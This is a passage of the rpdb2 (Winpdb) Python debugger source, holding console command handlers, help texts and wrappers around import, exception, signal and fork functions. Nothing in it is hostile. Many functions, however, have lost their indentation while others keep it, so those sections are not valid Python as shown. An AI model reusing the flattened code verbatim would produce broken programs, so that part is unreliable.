                        m = SOURCE_EVENT_RETURN + SYMBOL_MARKER
                    elif frame_event == 'exception':
                        m = SOURCE_EVENT_EXCEPTION + SYMBOL_MARKER
                    # Breakpoint column marker.
                    if breakpoints.get(lineno, None) == STATE_ENABLED:
                        b = SOURCE_BP_ENABLED
                    elif breakpoints.get(lineno, None) == STATE_DISABLED:
                        b = SOURCE_BP_DISABLED
                    else:
                        b = ''
                    line = line.replace('\t', ' ' * PYTHON_TAB_WIDTH)
                    _print(' %2s %1s %5d %s' % (m, b, lineno, calc_prefix(line[:-1], 60)), self.m_stdout)
            # Remember the listing window for subsequent '+'/'-' paging.
            if fAll or fEntire:
                self.m_last_source_line = None
            elif len(source_lines) != 0:
                self.m_last_source_line = [l + (nlines - 1) // 2, frame_lineno][l == -1]
            self.m_last_nlines = nlines
        except (InvalidFrame, IOError):
            self.printer(STR_SOURCE_NOT_FOUND)
        except (NoExceptionFound, NoThreads):
            self.m_session_manager.report_exception(*sys.exc_info())
    do_l = do_list
def do_up(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi - 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_down(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
fi = self.m_session_manager.get_frame_index()
self.m_session_manager.set_frame_index(fi + 1)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def evaluate_job(self, sync_event, expr):
try:
(value, warning, error) = self.m_session_manager.evaluate(expr)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
_print(value, self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_eval(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
sync_event = threading.Event()
t = threading.Thread(target = self.evaluate_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_v = do_eval
def execute_job(self, sync_event, suite):
try:
(warning, error) = self.m_session_manager.execute(suite)
if warning:
self.printer(STR_WARNING % warning)
if error:
_print(error + '\n', self.m_stdout)
if event_is_set(sync_event):
_print(self.prompt, self.m_stdout, feol = False)
return
except (NoExceptionFound, DebuggerNotBroken):
self.m_session_manager.report_exception(*sys.exc_info())
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
def do_exec(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
_print(STR_OUTPUT_WARNING, self.m_stdout)
sync_event = threading.Event()
t = threading.Thread(target = self.execute_job, args = (sync_event, arg))
t.start()
t.join(WAIT_FOR_BREAK_TIMEOUT)
if thread_is_alive(t):
_print(STR_OUTPUT_WARNING_ASYNC, self.m_stdout)
sync_event.set()
do_x = do_exec
    def do_encoding(self, arg):
        # Get or set the encoding (and 'raw' flag) used by eval/exec.
        # Argument form: ENCODING[, raw]; an empty ENCODING keeps the
        # current one and only updates the raw flag.
        if arg == '':
            encoding, fraw = self.m_session_manager.get_encoding()
            if encoding != ENCODING_AUTO:
                try:
                    codecs.lookup(encoding)
                except:
                    # Unknown codec; flag it in the display.
                    encoding += ' (?)'
            if fraw:
                encoding += ', ' + ENCODING_RAW
            _print(STR_ENCODING_MODE % encoding, self.m_stdout)
            return
        if ',' in arg:
            encoding, raw = arg.split(',')
        else:
            encoding, raw = arg, ''
        encoding = encoding.strip()
        if encoding == '':
            # Keep the current encoding; the fraw read here is immediately
            # overwritten below — only the encoding part is reused.
            encoding, fraw = self.m_session_manager.get_encoding()
        fraw = 'raw' in raw
        self.m_session_manager.set_encoding(encoding, fraw)
        if encoding != ENCODING_AUTO:
            try:
                codecs.lookup(encoding)
            except:
                # The mode is set anyway; warn that the codec is unknown.
                encoding += ' (?)'
                _print(STR_ENCODING_BAD, self.m_stdout)
        if fraw:
            encoding += ', ' + ENCODING_RAW
        _print(STR_ENCODING_MODE_SET % encoding, self.m_stdout)
def do_thread(self, arg):
if self.fAnalyzeMode and (arg != ''):
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
try:
if arg != '':
tid = int(arg)
self.m_session_manager.set_thread(tid)
_print(STR_THREAD_FOCUS_SET, self.m_stdout)
return
(current_thread_id, tl) = self.m_session_manager.get_thread_list()
_print(STR_ACTIVE_THREADS, self.m_stdout)
for i, t in enumerate(tl):
m = ['', SYMBOL_MARKER][t[DICT_KEY_TID] == current_thread_id]
state = [STATE_RUNNING, STR_STATE_BROKEN][t[DICT_KEY_BROKEN]]
_print(' %1s %3d %5d %-15s %s' % (m, i, t[DICT_KEY_TID], t[DICT_KEY_NAME], state[:25]), self.m_stdout)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
except ThreadNotFound:
self.printer(STR_THREAD_NOT_FOUND)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_t = do_thread
def do_analyze(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.set_analyze(not self.fAnalyzeMode)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_a = do_analyze
def do_synchro(self, arg):
if arg == '':
fsynchronicity = self.m_session_manager.get_synchronicity()
_print(STR_SYNCHRONICITY_MODE % str(fsynchronicity), self.m_stdout)
return
if arg == str(True):
fsynchronicity = True
elif arg == str(False):
fsynchronicity = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_synchronicity(fsynchronicity)
def do_trap(self, arg):
if arg == '':
ftrap = self.m_session_manager.get_trap_unhandled_exceptions()
_print(STR_TRAP_MODE % str(ftrap), self.m_stdout)
return
if arg == str(True):
ftrap = True
elif arg == str(False):
ftrap = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_trap_unhandled_exceptions(ftrap)
def do_fork(self, arg):
(ffork_into_child, ffork_auto) = self.m_session_manager.get_fork_mode()
if arg == '':
x = [FORK_PARENT, FORK_CHILD][ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][ffork_auto]
_print(STR_FORK_MODE % (x, y), self.m_stdout)
return
arg = arg.lower()
if FORK_PARENT in arg:
ffork_into_child = False
elif FORK_CHILD in arg:
ffork_into_child = True
if FORK_AUTO in arg:
ffork_auto = True
elif FORK_MANUAL in arg:
ffork_auto = False
self.m_session_manager.set_fork_mode(ffork_into_child, ffork_auto)
def do_password(self, arg):
if arg == '':
_rpdb2_pwd = self.m_session_manager.get_password()
if _rpdb2_pwd is None:
_print(STR_PASSWORD_NOT_SET, self.m_stdout)
else:
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
return
_rpdb2_pwd = arg.strip('"\'')
try:
self.m_session_manager.set_password(_rpdb2_pwd)
_print(STR_PASSWORD_SET % _rpdb2_pwd, self.m_stdout)
except BadArgument:
_print(STR_PASSWORD_BAD, self.m_stdout)
def do_remote(self, arg):
if arg == '':
fAllowRemote = self.m_session_manager.get_remote()
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
return
if arg == str(True):
fAllowRemote = True
elif arg == str(False):
fAllowRemote = False
else:
_print(STR_BAD_ARGUMENT, self.m_stdout)
return
self.m_session_manager.set_remote(fAllowRemote)
_print(STR_REMOTE_MODE % str(fAllowRemote), self.m_stdout)
def do_env(self, arg):
env = self.m_session_manager.get_environ()
if arg == '':
if len(env) == 0:
_print(STR_ENVIRONMENT_EMPTY, self.m_stdout)
return
_print(STR_ENVIRONMENT, self.m_stdout)
for k, v in env:
_print('%s=%s' % (k, v), self.m_stdout)
return
if arg[:2] == '-d':
k = arg[2:].strip()
_env = [(_k, _v) for (_k, _v) in env if _k != k]
self.m_session_manager.set_environ(_env)
return
try:
k, v = arg.split('=')
k = k.strip()
v = v.strip()
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
_env = [(_k, _v) for (_k, _v) in env if _k != k]
_env.append((k, v))
self.m_session_manager.set_environ(_env)
def do_stop(self, arg):
self.m_session_manager.stop_debuggee()
def do_exit(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.m_session_manager.get_state() != STATE_DETACHED:
try:
self.do_stop('')
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
_print('', self.m_stdout)
return True
do_EOF = do_exit
def do_copyright(self, arg):
self.print_notice(COPYRIGHT_NOTICE)
def do_license(self, arg):
self.print_notice(LICENSE_NOTICE + COPY_OF_THE_GPL_LICENSE)
def do_credits(self, arg):
self.print_notice(CREDITS_NOTICE)
def do_help(self, arg):
    """Print per-command help, or the full command summary when no
    argument is given. Fixed user-facing typo: 'futher' -> 'further'."""
    cmd.Cmd.do_help(self, arg)
    if arg == '':
        help_notice = """Security:
----------------
password - Get or set the channel password.
remote - Get or set "allow connections from remote machines" mode.
Session Control:
-----------------
env - Display or set the environment setting for new sessions.
host - Display or change host.
attach - Display scripts or attach to a script on host.
detach - Detach from script.
launch - Start a script and attach to it.
restart - Restart a script.
stop - Shutdown the debugged script.
exit - Exit from debugger.
Debuggee Control:
-----------------
break - Request an immediate break.
step - Continue to the next execution line.
next - Continue to the next execution line in the current frame.
return - Continue until the debugger is about to return from the frame.
jump - Jump to a line in the current scope.
go - Continue execution.
Breakpoints Control:
--------------------
bp - Set a break point.
bd - Disable a breakpoint.
be - Enable a breakpoint.
bc - Clear (delete) a breakpoint.
bl - List all breakpoints.
load - Load session breakpoints.
save - save session breakpoints.
Misc:
-----
thread - Display threads or switch to a particular thread.
list - List source code.
stack - Display stack trace.
up - Go up one frame in stack.
down - Go down one frame in stack.
encoding - Set the source encoding used by exec and eval commands.
eval - Evaluate expression in the context of the current frame.
exec - Execute suite in the context of the current frame.
analyze - Toggle analyze last exception mode.
trap - Get or set "trap unhandled exceptions" mode.
fork - Get or set fork handling mode.
synchro - Get or set synchronicity mode.
License:
----------------
copyright - Print copyright notice.
license - Print license.
credits - Print credits information.
type help <topic> for further information."""
        self.print_notice(help_notice)
# Static help topics: each method prints the usage text for one console command.
def help_copyright(self):
    _print("""copyright
Print copyright notice.""", self.m_stdout)
def help_license(self):
    _print("""license
Print license.""", self.m_stdout)
def help_credits(self):
    _print("""credits
Print credits information.""", self.m_stdout)
def help_help(self):
    _print("""help <cmd>
Print help for command <cmd>.
On the other hand I guess that you already know that, don't you?""", self.m_stdout)
# Help text for the 'analyze' command and its one-letter alias.
def help_analyze(self):
    _print("""analyze
(shorthand - a)
Toggle analyze last exception mode.
The following changes to the debugger behavior apply in analyze mode:
The debugger prompt changes to 'Analyze>'.
'go', 'step', 'next', and 'return' are not allowed.
'thread' does not allow to change the thread focus.
'stack' allows no arguments.
'list' does not accept the '*' (all threads) argument
'stack', 'list', 'eval', 'exec', 'up', and 'down' operate on the thrown
exception.""", self.m_stdout)
help_a = help_analyze
# Help text for the security-related commands.
def help_password(self):
    _print("""password <password>
Get or set the channel password.
Communication between the console and the debuggee is always authenticated and
optionally encrypted. The password (A secret known to the console and the
debuggee alone) governs both security methods. The password is never
communicated between the two components on the communication channel.
A password is always required since unsecured communication between the
console and the debuggee might expose your machine to attacks.""", self.m_stdout)
def help_remote(self):
    _print("""remote [True | False]
Get or set "allow connections from remote machines" mode.
When set to False:
Newly launched debuggees will listen on localhost only. In this mode, debugger
consoles on remote machines will NOT BE able to see or attach to the debuggee.
When set to True:
Newly launched debuggees will listen on INADDR_ANY. In this mode, debugger
consoles on remote machines will BE able to see and attach to the debuggee.""", self.m_stdout)
# Help text for the 'trap' and 'synchro' commands.
def help_trap(self):
    _print("""trap [True | False]
Get or set "trap unhandled exceptions" mode.
When set to False:
Debuggee will ignore unhandled exceptions.
When set to True:
Debuggee will pause on unhandled exceptions for inspection.""", self.m_stdout)
def help_synchro(self):
    _print("""synchro [True | False]
Get or set the synchronicity mode.
Traditional Python debuggers that use the inspected thread
(usually the main thread) to query or modify the script
name-space have to wait until the script hits a break-point.
Synchronicity allows the debugger to query and modify the
script name-space even if its threads are still running or
blocked in C library code by using special worker threads.
In some rare cases querying or modifying data in
synchronicity can crash the script. For example in some
Linux builds of wxPython querying the state of wx objects
from a thread other than the GUI thread can crash the
script. If this happens or if you want to restrict these
operations to the inspected thread, turn synchronicity off.
Default is True.""", self.m_stdout)
# Help text for the 'fork', 'stop', 'launch' and 'restart' commands.
def help_fork(self):
    _print("""fork [parent | child] [manual | auto]
Get or set fork handling mode.
Without arguments returns the current mode.
When 'parent' is specified the debugger will continue to debug the original
parent process after a fork.
When 'child' is specified the debugger will switch to debug the forked
child process after a fork.
When 'manual' is specified the debugger will pause before doing a fork.
When 'auto' is specified the debugger will go through the fork without
pausing and will make the forking decision based on the parent/child
setting.
WARNING:
On some Posix OS such as FreeBSD, Stepping into the child fork
can result in termination of the child process since the debugger
uses threading for its operation and on these systems threading and
forking can conflict.
""", self.m_stdout)
def help_stop(self):
    _print("""stop
Shutdown the debugged script.""", self.m_stdout)
def help_launch(self):
    _print("""launch [-k] <script_name> [<script_args>]
Start script <script_name> and attach to it.
-k Don't change the current working directory. By default the working
directory of the launched script is set to its folder.""", self.m_stdout)
def help_restart(self):
    _print("""restart
Restart a script with same arguments from last launch.""", self.m_stdout)
# Help text for the 'attach' and 'detach' commands.
def help_attach(self):
    _print("""attach [<arg>]
Without an argument, 'attach' prints the scripts available for debugging
on the selected host. To select a host use the 'host' command. A script is
considered available for debugging only if it is using the rpdb2 module or
has been executed by the debugger.
If the debugger is already attached to a script, a special character will
mark that script in the list.
When <arg> is an integer the debugger will try to attach to a script with
that pid.
When <arg> is a string the debugger will try to attach to a script
with that name in the list.""", self.m_stdout)
def help_detach(self):
    _print("""detach
Detach from the script the debugger is currently attached to. The detached
script will continue execution.""", self.m_stdout)
def help_break(self):
    """Help text for 'break'. Fixed user-facing typo: 'immdeiately' ->
    'immediately'."""
    _print("""break
(shorthand - b)
Request script to break (pause execution as if it hit a breakpoint).
The 'break' command returns immediately but the break is only established
when an active thread submits to the debugger control. If a thread is
doing a system call or executing C code, this will happen only when
it returns to do python code.""", self.m_stdout)
help_b = help_break
def help_bp(self):
    """Help text for 'bp'. Fixed user-facing typo: 'filemame' ->
    'filename'."""
    _print("""bp [<filename>':'] (<line> | <scope>) [',' <expr>]
Set a breakpoint.
<filename> - either the filename or the module name.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.
<expr> - condition to evaluate in the context of the frame. If it
evaluates to 'True' the break point will break into the debugger.
In case the <filename> is omitted, the current file is assumed. In this case
the debuggee has to be waiting at break point.
Examples:
bp test_file.py:20
bp test_file.py:MyClass.Foo
bp 304
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
# Help text for the breakpoint enable/disable/clear/list commands.
def help_be(self):
    _print("""be (<id_list> | '*')
Enable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - Enable all breakpoints.""", self.m_stdout)
def help_bd(self):
    _print("""bd (<id_list> | '*')
Disable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - disable all breakpoints.""", self.m_stdout)
def help_bc(self):
    _print("""bc (<id_list> | '*')
Clear (delete) breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - clear all breakpoints.""", self.m_stdout)
def help_bl(self):
    _print("""bl
List all breakpoints, sorted by their id.""", self.m_stdout)
# Help text for the breakpoint persistence commands.
def help_load(self):
    _print("""load [<filename>]
Load breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
def help_save(self):
    _print("""save [<filename>]
save breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
# Help text for 'go' and 'exit' (and their aliases).
def help_go(self):
    _print("""go [[<filename>':'] (<line> | <scope>)]
(shorthand - g)
Resume execution of a script that is waiting at break point.
If an argument is present, continue execution until that argument is reached.
<filename> - is the file name which basically is the script's name without
the '.py' extension.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.""", self.m_stdout)
help_g = help_go
def help_exit(self):
    _print("""exit
Exit the debugger. If the debugger is attached to a script, the debugger
will attempt to detach from the script first.""", self.m_stdout)
help_EOF = help_exit
# Help text for the 'host' and 'stack' commands.
def help_host(self):
    _print("""host [<arg>]
Without an argument, 'host' prints the current selected host.
With an argument <arg>, 'host' attempts to resolve <arg> to a known ip
address or a domain name. If it is successful, that host will become the
selected host.
The default selected host is the local host.
Subsequent 'attach' commands will be done on the selected host.
Type 'help attach' for more information.""", self.m_stdout)
def help_stack(self):
    _print("""stack [<tid> | '*']
(shorthand - k)
Without an argument, 'stack' prints the stack trace of the focused thread.
If the thread is waiting at break point a special character will mark the
focused frame.
<tid> - print the stack of thread <tid>
'*' - print the stacks of all active threads.
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_k = help_stack
# Help text for the 'list' command and its alias.
def help_list(self):
    _print("""list [<file_name>:][<line_no> | '+' | '-' | '^' | '*'] [',' <nlines>]
(shorthand - l)
Without an argument, 'list' prints the source lines around the current line
of the focused thread in the focused frame. A special character sequence will
mark the current line according to the event:
'C>' - call - A function is called.
'L>' - line - The interpreter is about to execute a new line of code.
'R>' - return - A function is about to return.
'E>' - exception - An exception has been thrown.
'*>' - running - The thread is running.
If a breakpoint is assigned to a line, that line will be marked with:
'B' - if the breakpoint is enabled
'D' - if the breakpoint is disabled
<file_name> - List source from filename
<line_no> - Print the source lines around that line number in the same file
of the current line.
'+' - Print the next lines in the file.
'-' - Print the previous lines in the file.
'^' - Print the entire file.
'*' - Print the source lines for each of the active threads.
<nlines> - Print <nlines> of source
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_l = help_list
# Help text for the 'thread' command and its alias.
def help_thread(self):
    _print("""thread [<no> | <tid>]
(shorthand - t)
Without an argument, 'thread' prints the list of known active threads, with
their corresponding state, which can be either 'running' or
'waiting at break point'. A special character will mark the focused thread.
With an argument <tid>, 'thread' will attempt to set the debugger focus to
the thread of that tid.
With an argument <no>, 'thread' will attempt to set the debugger focus to
the thread of that order in the thread list.
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
help_t = help_thread
# Help text for the 'jump' and 'next' commands (and aliases).
def help_jump(self):
    _print("""jump <lineno>
(shorthand - j)
Jump to line <lineno> in the current scope.""", self.m_stdout)
help_j = help_jump
def help_next(self):
    _print("""next
(shorthand - n)
Continue execution until the next line in the current function
is reached or it returns.""", self.m_stdout)
help_n = help_next
# Help text for the 'step' command and its alias.
def help_step(self):
    _print("""step
(shorthand - s)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function).""", self.m_stdout)
help_s = help_step
def help_return(self):
    """Help text for 'return'. Fixed copy-paste defect: the header line
    previously read 'next' (copied from help_next) although this topic
    documents the 'return' command."""
    _print("""return
(shorthand - r)
Continue execution until the current function returns.""", self.m_stdout)
help_r = help_return
# Help text for the 'up' command.
def help_up(self):
    _print("""up
move the debugger focus one frame up the stack of the debugged thread
(closer to the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
def help_down(self):
    # NOTE(review): the parenthetical below is identical to help_up's
    # ("closer to the current, most recently executed frame") - one of the
    # two directions is presumably wrong; confirm against the up/down
    # command implementation before changing the user-facing text.
    _print("""down
move the debugger focus one frame down the stack of the debugged thread
(closer to the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
# Help text for the 'eval' and 'exec' commands (and aliases).
def help_eval(self):
    _print("""eval <expr>
(shorthand - v)
Evaluate the python expression <expr> under the global and local name spaces
of the currently focused frame.
Example:
'eval locals()' - will display the dictionary of the local variables.
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_v = help_eval
def help_exec(self):
    _print("""exec <stmt>
(shorthand - x)
Execute the python suite <stmt> under the global and local name spaces
of the currently focused frame.
Example:
'exec i += 1'
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_x = help_exec
# Help text for the 'encoding' and 'env' commands.
def help_encoding(self):
    _print("""encoding [<encoding> [, raw]]
Set the source encoding for the exec and eval commands.
Without an argument returns the current encoding.
The specified encoding can be either 'auto' or any encoding accepted
by the codecs module. If 'auto' is specified, the source encoding of
the active scope will be used, which is utf-8 by default.
The default encoding value is 'auto'.
If 'raw' is specified, strings returned by the eval command
will represent non ASCII characters as an escape sequence.""", self.m_stdout)
def help_env(self):
    _print("""env [-d key | key = value]
Set the environment variables mapping. This mapping is used
when a new script is launched to modify its environment.
Example for a mapping on Windows:
env Path = %Path%;c:\\mydir
Example for a mapping on Linux:
env PATH = $PATH:~/mydir
To delete the mapping for PATH
env -d PATH
Without an argument returns the current list of mappings.
Note that the mapping will be evaluated and used to modify
the environment after the debugger engine at the debuggee
has imported the modules it requires. The order in which the
mappings will be evaluated and applied is:
last set, last evaluated.""", self.m_stdout)
#
# ---------------------------------------- Replacement Functions ------------------------------------
#
def rpdb2_import_wrapper(*args, **kwargs):
    """Wrapper installed over builtins __import__.

    Delegates to the original import, but on the FIRST import of 'gtk'
    enables gdk thread support so the debugger's worker threads do not
    conflict with the GUI.
    """
    if len(args) > 0:
        name = args[0]
    elif 'name' in kwargs:
        name = kwargs['name']
    else:
        return g_import(*args, **kwargs)
    if name in sys.modules:
        # Already imported once - no fix-up needed.
        return g_import(*args, **kwargs)
    #
    # rpdb2 avoids stepping through this
    # function (rpdb2_import_wrapper) to
    # prevent confusion when stepping into
    # an import statement.
    #
    module = g_import(*args, **kwargs)
    if name != 'gtk':
        return module
    # Best effort: try both known entry points; ignore any failure.
    for init_threads in (lambda: module.gdk.threads_init(),
                         lambda: module.threads_init()):
        try:
            init_threads()
            return module
        except:
            pass
    return module
g_import = None
if __name__ == 'rpdb2' and g_builtins_module.__import__ != rpdb2_import_wrapper:
    g_import = g_builtins_module.__import__
    g_builtins_module.__import__ = rpdb2_import_wrapper
def __find_eval_exec_frame_in_stack():
    """Walk the current call stack (innermost first) looking for the
    debugger's _evaluate/_execute frame; return it, or None if absent."""
    frame = sys._getframe(0)
    while frame is not None:
        code = frame.f_code
        if (DEBUGGER_FILENAME in code.co_filename
                and code.co_name in ('_evaluate', '_execute')
                and 'redirect_exc_info' in frame.f_locals):
            return frame
        frame = frame.f_back
    return None
def __exc_info():
    """Replacement for sys.exc_info().

    When called from inside the debugger's eval/exec machinery, return the
    exception recorded by the debugger for the focused frame; otherwise
    fall back to the original sys.exc_info().
    """
    frame = __find_eval_exec_frame_in_stack()
    if frame is None:
        return g_sys_exc_info()
    try:
        frame_index = frame.f_locals['frame_index']
        fException = frame.f_locals['fException']
        info = g_debugger.get_exception(frame_index, fException)
        return (info['type'], info['value'], info['traceback'])
    except:
        # Any lookup failure - fall back to the real exc_info.
        return g_sys_exc_info()
g_sys_exc_info = None
if __name__ == 'rpdb2' and 'exc_info' in dir(sys) and sys.exc_info != __exc_info:
    g_sys_exc_info = sys.exc_info
    sys.exc_info = __exc_info
def __setrecursionlimit(rl):
    # Wrapper over sys.setrecursionlimit(): records the requested limit,
    # enforces a floor of 64, and pads the real limit so the debugger's
    # own frames fit on the stack.
    global g_recursionlimit
    print_debug('rl = %d' % rl)
    g_recursionlimit = max(rl, 64)
    rl = g_recursionlimit
    if sys.version_info[:2] == (2, 6):
        # NOTE(review): extra headroom for Python 2.6 only; the factor of 3
        # looks empirical - confirm before changing.
        rl *= 3
    return g_sys_setrecursionlimit(rl + 64)
g_sys_setrecursionlimit = None
if __name__ == 'rpdb2' and 'setrecursionlimit' in dir(sys) and sys.setrecursionlimit != __setrecursionlimit:
    g_sys_setrecursionlimit = sys.setrecursionlimit
    sys.setrecursionlimit = __setrecursionlimit
    # Re-apply the current limit so the padding takes effect immediately.
    __setrecursionlimit(sys.getrecursionlimit())
def __find_debugger_frame():
    """Scan the whole call stack and return the OUTERMOST debugger
    trace_dispatch*/profile frame (the last match found walking from the
    innermost frame outward), or None if the debugger is not on the stack."""
    match = None
    frame = sys._getframe(0)
    while frame is not None:
        code = frame.f_code
        if DEBUGGER_FILENAME in code.co_filename and (
                code.co_name.startswith('trace_dispatch') or code.co_name == 'profile'):
            match = frame
        frame = frame.f_back
    return match
class CSignalHandler:
    # Helper object planted in a debugger frame's locals; when that frame
    # is torn down this destructor runs the signal handlers that were
    # deferred while the debugger's tracing code was on the stack.
    def __del__(self):
        while len(g_signals_pending) != 0:
            (handler, signum, frameobj) = g_signals_pending.pop(0)
            print_debug('Handling pending signal: %s, %s' % (repr(signum), repr(frameobj)))
            try:
                handler(signum, frameobj)
            except:
                #
                # Can not raise from inside a destructor. Report that handler
                # exception will be ignored.
                #
                (t, v, tb) = sys.exc_info()
                _t = safe_repr(t)
                if _t.startswith("<type '"):
                    _t = _t.split("'")[1]
                event = CEventSignalException(signum, '%s: %s' % (_t, safe_repr(v)))
                g_debugger.m_event_dispatcher.fire_event(event)
def signal_handler(signum, frameobj):
    # Proxy signal handler installed by __signal(). Runs the script's real
    # handler immediately when it is safe to do so, otherwise defers it
    # until the debugger's tracing code unwinds.
    frame = __find_debugger_frame()
    if frame == None:
        #
        # A debugger tracing frame was not found in the stack.
        # This means that the handler can be run without risk
        # for state corruption.
        #
        handler = signal.getsignal(signum)
        return handler(signum, frameobj)
    if frame.f_code.co_name == 'profile' and frame.f_locals['event'] != 'return':
        #
        # signal was caught inside the profile hook but not while
        # doing some debugger stuff. Call the handler but in case
        # of exception schedule the debugger to re-enable the
        # profile hook.
        #
        try:
            handler = signal.getsignal(signum)
            return handler(signum, frameobj)
        except:
            ctx = g_debugger.get_ctx(thread.get_ident())
            ctx.set_tracers(fsignal_exception = True)
            raise
    #
    # Set the handler to be run when the debugger is about
    # to return from the tracing code.
    #
    print_debug('Intercepted signal: %s, %s' % (repr(signum), repr(frameobj)))
    # If the interrupted frame is inside the debugger itself, report the
    # first script frame below it instead.
    f = frameobj
    while f != None:
        if f == frame:
            frameobj = frame.f_back
            break
        f = f.f_back
    handler = signal.getsignal(signum)
    g_signals_pending.append((handler, signum, frameobj))
    # Plant a CSignalHandler in the debugger frame's locals; its __del__
    # delivers the pending signals once the frame is discarded.
    if not 'signal_handler' in frame.f_locals:
        frame.f_locals.update({'signal_handler': CSignalHandler()})
    event = CEventSignalIntercepted(signum)
    g_debugger.m_event_dispatcher.fire_event(event)
    if signum == signal.SIGINT and g_debugger.is_waiting_for_attach():
        g_debugger.set_request_go_timer(0)
def __getsignal(signum):
    """Replacement for signal.getsignal(): report the handler the script
    registered through __signal(), falling back to the real getsignal."""
    return g_signal_handlers.get(signum, g_signal_getsignal(signum))
g_signal_getsignal = None
if __name__ == 'rpdb2' and 'getsignal' in dir(signal) and signal.getsignal != __getsignal:
    g_signal_getsignal = signal.getsignal
    signal.getsignal = __getsignal
def __signal(signum, handler):
    """Replacement for signal.signal(): install the debugger's proxy
    handler and remember the script's handler, so delivery can be
    deferred while debugger code is on the stack."""
    previous = __getsignal(signum)
    if handler in (signal.SIG_IGN, signal.SIG_DFL):
        # Ignore/default dispositions are safe - install them directly.
        g_signal_signal(signum, handler)
    else:
        g_signal_signal(signum, signal_handler)
        g_signal_handlers[signum] = handler
    return previous
g_signal_signal = None
if __name__ == 'rpdb2' and 'signal' in dir(signal) and signal.signal != __signal:
    g_signal_signal = signal.signal
    signal.signal = __signal
"""
def __setprofile(foo):
global g_profile
print_debug('*** setprofile to %s' % repr(foo))
traceback.print_stack(file = sys.__stderr__)
if thread_get_name(current_thread()) == 'MainThread':
g_profile = foo
g_sys_setprofile(foo)
g_sys_setprofile = None
if __name__ == 'rpdb2' and sys.setprofile != __setprofile:
g_sys_setprofile = sys.setprofile
sys.setprofile = __setprofile
"""
def __fork():
    # Wrapper installed over os.fork(): break into the debugger just before
    # forking so the user can choose parent/child debugging.
    global g_forktid
    if not g_fignorefork:
        g_forktid = setbreak()
    #
    # os.fork() has been called.
    #
    # You can choose if you would like the debugger
    # to continue with the parent or child fork with
    # the 'fork' console command.
    #
    # For example: 'fork child' or 'fork parent'
    # Type: 'help fork' for more information.
    #
    # WARNING:
    # On some Posix OS such as FreeBSD,
    # Stepping into the child fork can result in
    # termination of the child process.
    #
    # *** RPDB2 SAYS: Read the entire comment! ***
    #
    return g_os_fork()
g_os_fork = None
if __name__ == 'rpdb2' and 'fork' in dir(os) and os.fork != __fork:
    g_os_fork = os.fork
    os.fork = __fork
def __exit(n):
    # Wrapper installed over os._exit(): break into the debugger before the
    # process terminates.
    global g_fos_exit
